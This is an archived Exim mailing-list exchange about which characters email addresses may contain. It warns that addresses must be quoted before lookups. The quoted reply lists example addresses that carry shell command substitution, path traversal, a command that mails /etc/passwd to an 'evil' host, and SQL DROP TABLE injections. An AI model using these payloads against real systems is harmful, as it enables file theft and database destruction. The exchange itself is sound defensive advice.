Auteur: Andy Smith Datum: Aan: exim-users Onderwerp: Re: [exim] which config file is being read?
> On 2008-09-28 at 12:29 +0100, Andy Smith wrote:
>> thanks, I had checked if " is a valid character for an email address
>> and I
>> dont think it is, but your solution is better as u never know who will
>> break
>> the rules ;)
>
> It is valid. Left-hand sides can use double-quotes to expand the
> available set of characters.
>
> Valid email addresses (syntactically):
> fred@???
> "fred bloggs"@???
> " fred "@???
> ""@???
> a~`*&^%$#!._-={|}'/+?b@???
> ../etc/passwd@???
> `cat%20/etc/passwd`@???
> "cat /etc/passwd | Mail -s w00t evil@???
>
> And in homage to http://xkcd.com/327/ I offer:
> "phil'); DROP TABLE domains; DROP TABLE passwords; --"@???
>
> So yes, ${quote_<lookup-type>:<string>} is rather important to use.
>
> Regards,
> "X'); DROP TABLE domains; DROP TABLE passwords; --"@???
> (yes, that address is valid and reaches me, and not via catchall)
>
ok thanks hehe, thats what i get for believing wikipedia :S